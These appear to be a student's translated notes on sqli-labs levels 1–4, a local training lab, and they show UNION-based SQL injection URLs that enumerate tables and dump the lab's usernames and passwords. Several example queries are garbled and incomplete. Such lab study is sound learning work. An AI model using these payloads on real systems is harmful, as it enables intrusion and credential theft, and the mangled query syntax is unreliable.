Learn SQL injection, a bit of my notes when I do sqli-labs. There may be errors, if someone finds out welcome.
Common knowledge points:
There are three types of 1.mysql annotations: ①#: Comments from # to end of line
②--Space: Comment To line end, note--must have a space after
③/**/: Comments/* to */contents
2. Querying the user database name
Select from Information_schema. SCHEMA 0,1
3. Querying the current database table
Select from where Table_schema=(selectDATABASE0,1
4. Querying all fields of the specified table
Select from where table_name='xxx'0,1
5. Joint queries
Select from Union Select 1,2,3
6. Group_concat multiple rows of results into a single line
Select group_concat (userfromtable01
Use Group_concat to put multiple results into one line. This allows all information to be displayed if there is only one display bit
7. Combine multiple fields into one field concat
Select from Table
Less-1: Error message, single quote
Base statement: http://127.0.0.1/sqli-labs/Less-1/?id=
1. Test if the ID type is a string, using single quotes ' test
http://127.0.0.1/sqli-labs/less-1/?id= '
Tip: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use near "LIMIT 0,1 ' at line 1
"', stating ID is a string type
2. There are several fields in the test query, with union, the test has 3 paragraphs, and 2, 3 segments will show
http//127.0.0.1/Sqli-Labs/Less-1/? id='Union Select--A
http//127.0.0.1/Sqli-Labs/Less-1/? id=% -%20Union%20Select%201,2,3% ---%20a
3. Querying data in a database
① Querying all table information in a database
http://127.0. 0.1 /sqli-Labs/less-1/? id=' Union Select 1,GROUP_CONCAT (table_name), 3 from INFORMATION_SCHEMA. TABLES WHERE table_schema= (select DATABASE ()) LIMIT 0,1--a
Results: Your Login name:emails,referers,uagents,users
Description There are four sheets
② view all fields in the Users table
http://127.0. 0.1 /sqli-Labs/less-1/? id=' Union Select 1, Group_concat (column_name), 3 from INFORMATION_SCHEMA. COLUMNS WHERE table_name='users' LIMIT 0,1--a
Results: Your Login Name:id,username,password
③ Querying all user name passwords
http://127.0. 0.1 /sqli-Labs/less-1/? id=' Union Select 1, group_concat (username), Group_concat (password) from users LIMIT 0,1--a
Results:
Your Login Name:dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:dumb,i-kill-you,[email Protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo , Admin4
Questions:
Why does the annotation use-a can, use # can not?
Less-2: Error, Integer
① Test ID Type
http://127.0. 0.1 /sqli-Labs/less-2/? id='
Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use near "LIMIT 0,1 ' at line 1
Error only ' LIMIT 0, 1, description ID is numeric, no other quotes wrapped
② queries all usernames and passwords and joins order by to ensure that all content is displayed. The middle step is the same as the first question, skipping.
http//127.0.0.1/Sqli-Labs/Less-2/? id=3 Union Select 1, Group_concat (username), Group_concat (password) fromUsersORDER byID LIMIT0,1 --a
Less-3: Error, interfering string
① Test ID Type
http://127.0. 0.1 /sqli-Labs/less-3/? id='
Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' ") LIMIT 0,1 ' at line 1
The difference with the first question is that the ID is followed by a parenthesis, and it can be inferred that the ID is in the format of id = (' 3 '). So when you construct SQL, you have to pay attention to closing the parentheses in addition to closing the quotes.
② querying all user names and passwords
http://127.0. 0.1 /sqli-Labs/less-3/? id=3' ) Union Select 1, Group_concat (username), Group_concat (password) from the users ORDER by ID LIMIT 0,1--a
Less-4: Error, double quote
① Test ID Type
http://127.0. 0.1 /sqli-Labs/less-4/? id='
Results normal output, continue to test, here lazy, according to the name of the direct test double quotation marks
http://127.0. 0.1 /sqli-Labs/less-4/? id= "
Results: You have a error in your SQL syntax; Check the manual-corresponds to your MySQL server version for the right syntax-use-near ' "") LIMIT 0,1 ' on line 1
The description ID is a string and is written as ID = ("3")
② get all user name passwords, close double quotes and parentheses
http//127.0.0.1/Sqli-Labs/Less-4/? id=3")Union Select 1, Group_concat (username), Group_concat (password) fromUsersORDER byID LIMIT0,1 --a
"Sqli-labs" Less1~less4